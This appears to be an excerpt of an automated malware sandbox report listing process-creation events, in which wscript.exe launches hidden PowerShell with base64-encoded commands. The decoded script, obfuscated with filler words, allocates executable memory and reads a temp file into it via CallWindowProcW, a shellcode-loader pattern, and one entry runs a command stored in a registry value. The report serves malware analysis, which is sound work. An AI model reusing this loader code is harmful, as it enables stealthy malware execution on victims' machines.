            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
            Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala
            Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk UnscalaJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk UnscalaJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk UnscalaJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAB